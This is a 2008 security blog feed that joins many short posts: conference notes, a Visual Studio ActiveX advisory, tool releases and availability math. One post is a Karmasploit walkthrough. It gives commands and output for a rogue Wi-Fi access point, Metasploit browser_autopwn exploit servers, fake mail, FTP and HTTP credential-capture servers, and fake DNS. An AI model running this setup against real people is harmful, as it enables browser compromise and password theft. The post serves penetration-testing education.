Spliced feed for Security Bloggers Network |

| Air Force Cyber Command halted…? [SecuraBit] Posted: 18 Aug 2008 07:10 AM CDT So the Air Force, which prides itself on being the most technical branch of the armed forces, has decided to suspend its efforts to build its latest Cyber Command. Not sure if any of you recall the latest AF recruitment commercials geared around cyber security, but it would be safe to say that [...] |

| SANS Mentor SEC 504 in Long Island, NY [Kees Leune] Posted: 17 Aug 2008 07:31 PM CDT SANS courses have a reputation for being the best technical vendor-neutral security training available at the moment. I am pleased to announce that I have recently joined the SANS Mentor program, and I am currently preparing to host a SEC 504 Hacker Techniques, Exploits & Incident Handling class. The class prepares attendees for the GIAC Certified Incident Handler (GCIH) certification. We are currently looking at starting the class somewhere around Christmas. Mentor classes run for 10 consecutive weeks, two hours a week, usually in the early evening. If you are interested in taking the class through the Mentor program, and if you are able (and willing) to travel to Long Island (NY) to take the class, please let me know. Exact dates and times have not yet been determined, so I can work with you on that aspect. For now, we are looking at holding the classes in Garden City or in Hauppauge. |

| Posted: 17 Aug 2008 05:44 PM CDT Defcon was awesome. I got to meet a whole lot of people who I wanted to say hello to and a whole bunch of people who I had never heard of but enjoyed hanging out with, and I was unable to hook up with some people who I had really wanted to see. Oh well, there is always next year! I'm not going into much detail; if you were there you know what it was like, and if you weren't, I don't think I would be able to convey the Con as a whole. This picture captures it fairly well though ;)

|

| DAVIX 1.0.1 Released [Security Data Visualization] Posted: 17 Aug 2008 12:44 PM CDT After months of building and testing, the long-anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exciting moment for us and we are curious to see how the product is received by the audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not counted. All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. We wish you happy visualizing! Kind regards |

| An Exploit That Targets Developers [Sunnet Beskerming Security Advisories] Posted: 17 Aug 2008 11:00 AM CDT Towards the end of last week a vulnerability affecting Microsoft's Visual Studio was identified in the wild, though it isn't known just how widespread the attacks are at this stage. While the mechanism of the vulnerability, an ActiveX control buffer overflow leading to remote code execution, isn't exactly new, it is the target (and the fact that it is being actively targeted) that makes it somewhat interesting. In the past there have been proof-of-concept and limited-release vulnerabilities targeting developers, reverse engineers, forensic analysts, and a range of other service providers. What hasn't really happened with any of the previous examples is a move to exploitation in the wild. Developers who are not able to separate their development environment from the Internet, and who use their development systems to surf the Internet, will be at greatest risk from this particular exploit. With the increasing availability of high-quality online development libraries and code samples, it is becoming rarer for developers to maintain a clear separation between the two, and so the vulnerable userbase is actually quite a high proportion of the total number of Visual Studio installations. If you have Visual Studio 6 installed and you want to be protected against the vulnerability in the Msmask32.ocx ActiveX Control, either install version 6.0.84.18 (reported to be fixed in this version), or set the killbit for the following CLSID in the Registry : |
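For the killbit workaround mentioned in the Visual Studio entry above, here is a small sketch that generates a `.reg` file. The CLSID is not reproduced in this digest, so `PLACEHOLDER_CLSID` is a stand-in that must be replaced with the value from the original advisory, and the helper name `killbit_reg_file` is made up for this example. The registry location and the 0x400 `Compatibility Flags` value are the usual way Internet Explorer kill bits are set.

```python
# Registry key under which Internet Explorer looks up ActiveX kill bits.
KILLBIT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
               r"\ActiveX Compatibility")
KILLBIT_FLAG = 0x00000400  # "Compatibility Flags" value that sets the kill bit

# Stand-in only: substitute the CLSID published in the advisory.
PLACEHOLDER_CLSID = "{00000000-0000-0000-0000-000000000000}"


def killbit_reg_file(clsid):
    """Return the text of a .reg file that sets the kill bit for `clsid`."""
    return "\r\n".join([
        "Windows Registry Editor Version 5.00",
        "",
        f"[{KILLBIT_KEY}\\{clsid}]",
        f'"Compatibility Flags"=dword:{KILLBIT_FLAG:08x}',
        "",
    ])


reg_text = killbit_reg_file(PLACEHOLDER_CLSID)
print(reg_text)
```

The generated text would still need to be reviewed and imported on the affected machine; nothing here touches the registry directly.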

| Spamtastic? Nope, SPAMTACULAR [Vitalsecurity.org - A Revolution is the Solution] Posted: 17 Aug 2008 10:57 AM CDT |

| Posted: 17 Aug 2008 10:48 AM CDT ....oh, all sorts of things, WTF Cat! For example, this past week we've seen....
* Automated Spim on Microblogging Site Via MSN Messenger - I thought this was a clever way of zinging out automated spim on sites similar to Twitter. Naughty, naughty spammers.
* CNN Spam - There's been all sorts of spam shenanigans going on this past week or so, hasn't there? [1], [2]
* Marketing Bot Allows Insertion of Custom Facebook Feed Messages - I think this is a very bad idea.
* Spamblogs Pushing Rogue Antivirus Programs - Nothing Earth-shaking, but always worth keeping an eye on this kind of thing.
* Trust No One? - An interesting email that's either legit, fake or somewhere in between. I'm going to be digging into this one a bit more, hopefully.
* A Dark Knight for Zango - A three part wing-dinger, with thrills, spills and chills! Also, pirate movies.
Anyway, that's it for this week! If I'm late with the roundup again, may WTF Cat beat me soundly with a wet kipper. |

| Metasploit + Karma=Karmasploit Part 1 [Carnal0wnage Blog] Posted: 16 Aug 2008 11:38 PM CDT

HD Moore released some documentation to get karmasploit working with the framework. First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch (I used the 2nd patch), so apply that before you make/make install. You may also need a current version of the madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall.

Ok, so you've got an updated version of aircrack, a patched airbase-ng, and madwifi drivers, and can inject packets? Let's continue. Let's do our aireplay-ng test to see if things are working:

    root@WPAD:/home/cg# aireplay-ng --test ath40
    19:55:44 Trying broadcast probe requests...
    19:55:44 Injection is working!
    19:55:46 Found 5 APs
    19:55:46 Trying directed probe requests...
    19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
    19:55:52 0/30: 0%
    19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
    19:55:58 0/30: 0%
    19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
    19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
    19:56:03 5/30: 16%
    19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
    19:56:09 0/30: 0%
    19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
    19:56:15 0/30: 0%

Looks like we are good. Now just follow the steps in the documentation: I installed dhcpd3 and set up my conf file, did an svn update on the metasploit trunk, made sure the sqlite3 stuff was working, and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward. With all the config files set up it's pretty easy to get things going.

    root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
    02:59:55 Created tap interface at0
    02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
    02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
    02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
    02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
    03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
    03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
    03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
    03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
    03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
    03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
    ----snip------
    03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
    03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
    03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
    03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet

**You get the idea...

airbase-ng creates an at0 tap, so you have to configure it and set the MTU size (all this is from the karmasploit documentation):

    root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0
    root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400
    root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

    root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
    Internet Systems Consortium DHCP Server V3.0.5
    Copyright 2004-2006 Internet Systems Consortium.
    All rights reserved.
    For info, please visit http://www.isc.org/sw/dhcp/
    Wrote 4 leases to leases file.
    Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
    Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
    Sending on Socket/fallback/fallback-net

After that we run our karma.rc file using msfconsole.

    root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
           =[ msf v3.2-release
    + -- --=[ 304 exploits - 124 payloads
    + -- --=[ 18 encoders - 6 nops
           =[ 79 aux
    resource> load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    resource> db_create /root/karma.db
    [*] The specified database already exists, connecting
    [*] Successfully connected to the database
    [*] File: /root/karma.db
    resource> use auxiliary/server/browser_autopwn
    resource> setg AUTOPWN_HOST 172.16.1.207
    AUTOPWN_HOST => 172.16.1.207
    resource> setg AUTOPWN_PORT 55550
    AUTOPWN_PORT => 55550
    resource> setg AUTOPWN_URI /ads
    AUTOPWN_URI => /ads
    resource> set LHOST 172.16.1.207
    LHOST => 172.16.1.207
    resource> set LPORT 45000
    LPORT => 45000
    resource> set SRVPORT 55550
    SRVPORT => 55550
    resource> set URIPATH /ads
    URIPATH => /ads
    resource> run
    [*] Starting exploit modules on host 172.16.1.207...
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
    [*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
    [*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
    [*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
    [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
    [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
    [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
    [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
    [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
    [*] Server started.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
    [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
    [*] Server started.
    [*] Started reverse handler
    [*] Server started.
    [*] Using URL: http://0.0.0.0:55550/ads
    [*] Local IP: http://127.0.0.1:55550/ads
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/pop3
    resource> set SRVPORT 110
    SRVPORT => 110
    resource> set SSL false
    SSL => false
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/pop3
    resource> set SRVPORT 995
    SRVPORT => 995
    resource> set SSL true
    SSL => true
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/ftp
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/imap
    resource> set SSL false
    SSL => false
    resource> set SRVPORT 143
    SRVPORT => 143
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/imap
    resource> set SSL true
    SSL => true
    resource> set SRVPORT 993
    SRVPORT => 993
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/smtp
    resource> set SSL false
    SSL => false
    resource> set SRVPORT 25
    SRVPORT => 25
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/smtp
    resource> set SSL true
    SSL => true
    resource> set SRVPORT 465
    SRVPORT => 465
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/fakedns
    resource> unset TARGETHOST
    Unsetting TARGETHOST...
    resource> set SRVPORT 5353
    SRVPORT => 5353
    resource> run
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/fakedns
    resource> unset TARGETHOST
    Unsetting TARGETHOST...
    resource> set SRVPORT 53
    SRVPORT => 53
    resource> run
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/http
    resource> set SRVPORT 80
    SRVPORT => 80
    resource> set SSL false
    SSL => false
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/http
    resource> set SRVPORT 8080
    SRVPORT => 8080
    resource> set SSL false
    SSL => false
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/http
    resource> set SRVPORT 443
    SRVPORT => 443
    resource> set SSL true
    SSL => true
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    resource> use auxiliary/server/capture/http
    resource> set SRVPORT 8443
    SRVPORT => 8443
    resource> set SSL true
    SSL => true
    resource> run
    [*] Server started.
    [*] Auxiliary module running as background job
    msf auxiliary(http) >

Next post we'll see karmasploit in action. |

| Defcon Thoughts [Carnal0wnage Blog] Posted: 16 Aug 2008 11:32 PM CDT Everyone else (g0ne, ncircle, terminal23) is doing their thoughts on Defcon so I figured I would too. I've been waiting on a couple of people to actually post the code they talked about but I'm growing impatient and I guess I can use the release for other posts.

Let's start with the Cons:
-The Badges...oops that sucked...least not getting one when I first paid, the blinky lights were cool. At least mine worked this year.
-The stench...oops that stunk...like rotting corpse bad.
-The Goons...hmmm what to say...I know you have a tough job with crowd control and whatnot but do you really have to talk to everyone like they are assholes? I'm not sure you have a reason to be screaming at 11am Friday morning, save that shit for Sunday.
-The Crowds...sucks...that narrow ass hallway combined with the stench = no fun
-The Talks...I didn't care for most of the talks (maybe I just picked bad), of course there were a few good ones, but props to everyone that submitted a paper and stood up there in front of a ton of people. I think the boss is convinced to do BH next year, everyone I talked to that went to BH was pleased with the talks.

The Pros:
-The Parties...303, hackerpimps, securabit/i-hacker, offensive computing, freakshow, i-sight, core impact, etc
-The People...not the crowds but getting to meet in person people I talk to online all the time...regrets...not making it to the security twits meetup.
-The CTF...I had people explain to me a little better than last year what the hell is actually going on. Pretty interesting.
-The Guitar Hero competition...fun!
-The Swag...my green/black defcon coffee cup rulez.
-The Twitter(ing)...very cool to watch the twits in real time during talks...mvp to jjx for most tweets or twits or whatever they are called.

I'll do a separate post on the talks I thought stood out at Defcon. |

| Crash Course In Penetration Testing Workshop at Toorcon [Carnal0wnage Blog] Posted: 15 Aug 2008 08:15 PM CDT Joe and I will be conducting our Crash Course In Penetration Testing Workshop at Toorcon in September. http://sandiego.toorcon.org/content/section/4/8/ Description Instructors: Joseph McCray & Chris Gates |

| SecViz got a new Logo [Security Data Visualization] Posted: 15 Aug 2008 04:24 PM CDT |

| The Daily Incite - August 15, 2008 [Security Incite Rants] Posted: 15 Aug 2008 08:27 AM CDT  August 15, 2008 - Volume 3, #69 Good Morning:

Top Security News Don't hold your breath for the demise of passwords

Top Blog Postings He blinded me with science....SCIENCE |

| Crowbar 0.941 [extern blog SensePost;] Posted: 15 Aug 2008 08:25 AM CDT Quick update on your favourite brute forcer... The file input "MS EOF char" issue has been resolved, and provision has been made for blank passwords too. The above-mentioned error meant that Crowbar incorrectly used EOF characters on *nix-based files. Regarding the blank passwords, simply include the word "[blank]" (without the quotes) in your brute force file and Crowbar will test for blank usernames/passwords as well. For those of you that don't know, Crowbar is a generic brute force tool used for web applications. It's free, it's light-weight, it's fast, it's kewl :> Get it at http://www.sensepost.com/research/crowbar/ frankieg |

| SecuraBit Episode 8 [SecuraBit] Posted: 15 Aug 2008 06:01 AM CDT On this Episode of SecuraBit available here! Back from three week hiatus! Defcon and BlackHat Notable Defcon Parties Jay and Chris attended: Core Impact EthicalHacker.net Cisco Isight I-hacked StillSecure and IOActive Freakshow Special thanks to all that allowed us to drink for free Hopefully you got a cool Securabit T-shirt out of it! ChicagoCon: Boot Camps: Oct 27 - 31 Conference: [...] |

| Estimating Availability of Simple Systems - Non-redundant [Last In - First Out] Posted: 14 Aug 2008 11:02 PM CDT

In the Introductory post to this series, I outlined the basics for estimating the availability of simple systems. This post picks up where the first post left off and attempts to look at availability estimates for non-redundant systems. Let's go back to the failure estimate chart from the introductory post



And apply it to a simple stack of three non-redundant devices in series. For each device: .2 failures/year * 4 hours to recover = .8 hours/year unavailability. For three devices in series, each with approximately the same failure rate and recovery time, the unavailability estimate would be the sum of the unavailability of each component, or .8 + .8 + .8 = 2.4 hours/year.

Notice a critical consideration. ***The more non-redundant devices you stack up in series, the lower your availability.*** (Notice I made that sentence in bold and italics. I did that 'cause it's a really important concept.)

The non-redundant series dependencies also apply to other interesting places in a technology stack. For example, if I want my really big server to go faster, I add more memory modules so that the memory bus can stripe the memory access across more modules and spend less time waiting for memory access. Those memory modules are effectively serial and non-redundant. So for a fast server, we'd rather have 16 x 1GB DIMMs than 8 x 2GB DIMMs or 4 x 4GB DIMMs. The server with 16 x 1GB DIMMs will likely go faster than the server with 4 x 4GB DIMMs, but it will be 4 times as likely to have a memory failure.

Let's look at a more interesting application stack, again a series of non-redundant components. We'll assume that this is a T1 from a provider, a router, a firewall, a switch, an application/web server, a database server and an attached RAID array. The green path shows the dependencies for a successful user experience. The availability calculation is a simple sum of the products of failure frequency and recovery time for each component.
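The series arithmetic above can be sketched in a few lines of Python. This is only an illustration, not the author's tooling: the function name `annual_downtime_hours` is made up for the example, the 0.2 failures/year and 4-hour recovery figures come from the text, and the per-DIMM figures are placeholders chosen only to show the ratio between the two memory configurations.

```python
def annual_downtime_hours(components):
    """Expected downtime for non-redundant components in series.

    `components` is an iterable of (failures_per_year, recovery_hours)
    pairs; the estimate is the sum of their products.
    """
    return sum(failures * recovery for failures, recovery in components)


# Three identical devices in series, figures taken from the text.
three_devices = [(0.2, 4.0)] * 3
stack_downtime = annual_downtime_hours(three_devices)

# DIMM comparison. The per-module numbers are hypothetical placeholders;
# only the ratio between the two configurations matters here.
dimm = (0.05, 4.0)
ratio = annual_downtime_hours([dimm] * 16) / annual_downtime_hours([dimm] * 4)

print(f"three devices in series: {stack_downtime:.1f} hours/year")
print(f"16 DIMMs vs 4 DIMMs: {ratio:.1f}x the expected memory downtime")
```

Because every component in the list adds its own term to the sum, lengthening the list can only increase the estimate, which is the point of the emphasized sentence.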

The estimate for this simple example works out to be about 16 hours of down time per year, not including any application issues such as performance problems or scalability issues.
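To put the 16-hour figure in the more familiar "percent available" form, a quick conversion helps. The sketch below assumes a non-leap year of 8760 hours; `availability_percent` is a name invented for this example.

```python
HOURS_PER_YEAR = 24 * 365  # assumes a non-leap year: 8760 hours


def availability_percent(downtime_hours_per_year):
    """Convert expected annual downtime into an availability percentage."""
    return 100.0 * (1.0 - downtime_hours_per_year / HOURS_PER_YEAR)


estimate = availability_percent(16)  # the ~16 hours/year from the text
print(f"{estimate:.2f}% available")
```

Under that assumption, 16 hours of down time per year corresponds to roughly 99.82% availability, before any application or human factors are added.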

Applying the Estimate to the Real World

To apply this to the real world and estimate an availability number for the entire application, you'd have to know more about the application, the organization, and the persons managing the systems. For example, assume that the application is secure and well written, that there are no scalability issues, and that the application has version control, test, dev and QA implementations and a rigorous change management process. That application might suffer few if any application-related outages in a typical year. Figure one bad deployment per year that causes 2 hours of down time. On the other hand, assume that it is poorly designed, that there is no source code control or structured deployment methodology, no test/QA/dev environments, and no change control. I've seen applications like that have a couple hours a week of down time. And if you consider the human factor, that the humans in the loop (the keyboard-chair interface) will eventually misconfigure a device, reboot the wrong server, fail to complete a change within the change window, etc., then you need to pad this number to take the humans into consideration. On to Part Two (or back to the Introduction?) |

| Estimating Availability of Simple Systems - Redundant [Last In - First Out] Posted: 14 Aug 2008 11:02 PM CDT This is a continuation of a series of posts that attempt to provide the basics of estimating the availability of various simple systems. The Introduction covered the fundamentals; Part One covered estimating the availability of non-redundant systems. This post will attempt to cover simple redundant systems. Let's go back to the failure estimate chart from the introductory post, but this time modify it for active/passive redundancy. Remember that for redundant components, the number of failures is the same (the MTBF doesn't change), but the time to recover (MTTR) is shortened dramatically. The MTTR is no longer the time it takes to determine the cause of the failure and replace the failed part; it is the time that it takes to fail over to the redundant component.

Notice the nice small numbers in the far right column. Redundant systems tend to do a nice job of reducing MTTR. Note that if you believe in complexity and the human factor, you might argue that because they are more complex, redundant systems have more failures. I'm sure this is true, but I haven't considered that for this post (yet). Note also that I consider SAN LUN failure to be the same as for the non-redundant case. I've assumed that LUNs are always configured with some form of redundancy, even in the non-redundant scenario.
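A rough sketch of why failover shrinks the downtime estimate follows. It reuses the 0.2 failures/year and 4-hour repair time from the non-redundant post and assumes a hypothetical one-minute failover; the chart's actual figures are not reproduced here, so these numbers are illustrative only.

```python
FAILURES_PER_YEAR = 0.2      # unchanged by redundancy (same MTBF)
REPAIR_HOURS = 4.0           # MTTR when the failed part must be replaced
FAILOVER_HOURS = 1.0 / 60.0  # hypothetical one-minute failover


def downtime_hours(failures_per_year, mttr_hours):
    """Expected annual downtime: failure frequency times time to recover."""
    return failures_per_year * mttr_hours


non_redundant = downtime_hours(FAILURES_PER_YEAR, REPAIR_HOURS)
redundant = downtime_hours(FAILURES_PER_YEAR, FAILOVER_HOURS)

print(f"non-redundant: {non_redundant * 60:.0f} minutes/year")
print(f"active/passive: {redundant * 3600:.0f} seconds/year")
```

The failure count is identical in both cases; only the recovery term changes, which is why the redundant estimate drops from minutes to seconds under these assumed values.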

Under normal operation, the green devices are active, and failure of any active device causes an application outage equal to the failover time of the high availability device pair.

The estimates for failure frequency and recovery time are:

These numbers imply some assumptions about some of the components. For example, in this trivial case, I'm assuming that :

These numbers look pretty good, but don't start jumping up and down yet. Humans are in the loop, but not accounted for in this calculation. As I indicated in the human factor, the human can, in the case where redundant systems are properly designed and deployed, be the largest cause of down time (the keyboard-chair interface is non-redundant). Also, there is no consideration for the application itself (bugs, failed deployments) or for the database (performance problems, bugs). As indicated in the previous post, a poorly designed application that is down every week because of performance issues or bugs isn't going to magically have fewer failures because it is moved to redundant systems. It will just be a poorly designed, redundant application.

Coupled Dependencies

A quick note on coupled dependencies. In the example above, the design is such that the load balancer, firewall and router are coupled. (In this design they are; in other designs they are not.) A hypothetical failure of the active firewall would result in a firewall failover, a load balancer failover, and perhaps a router HSRP failover. The MTTR would be the time it takes for all three devices to figure out who is active. Coupled dependencies tend to cause unexpected outages themselves. Typically, when designing systems with coupled dependencies, thorough testing is needed to uncover unexpected interactions between the coupled devices. (In the case shown here, the interaction between HSRP, the routing protocol, the active/passive firewall, and layer 2 redundancy at the switch layer is complex enough to be worth a day in the lab.)

Conclusions

Keep in mind that the combination of application, human and database outages, not considered in the calculation, will far outweigh simple hardware and operating system failures. For your estimations, you will have to add failures and recovery time for human failure, application failure and database failure. (Hint - figure a couple hours each per year.) As indicated in the introductory post, I tried. Back to the Introduction (or the previous post). |

| Using the DNS Question to Carry Randomness - a Temporary Hack? [Last In - First Out] Posted: 14 Aug 2008 10:51 PM CDT

I read Mark Rothman's post Boiling the DNS Ocean. This led me to a thought (just a thought): somewhere within the existing DNS protocol, there has to be a way of introducing more randomness in the DNS question and getting that randomness back in the answer, simply to increase the probability that a resolver can trust an authoritative response. Of course, having never written a resolver, I'm not qualified to analyze the problem -- but this being the blogosphere, that's not a reason to quit posting. Hmm…….How about using NXDOMAIN to carry the bits back to the resolver? a solution here would be opportunistic and pairwise deployable, requiring The 'pairwise deployable' part is still a problem. There are an awful lot of nameservers out there. --Mike |

| Welcome back to My Friend, Alan Shimel [An Information Security Place] Posted: 14 Aug 2008 09:57 PM CDT I have two things to say: 1. Welcome back to the blogosphere Alan. Great to have you back. 2. You people who screwed with him are filthy bastard racist cowards. Vet |

| DAVIX 1.0.1 Officially Launched [iplosion security] Posted: 14 Aug 2008 05:39 PM CDT After months of building and testing, the long-anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exciting moment for me and I am curious to see how the product is received by the audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not counted.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing! |

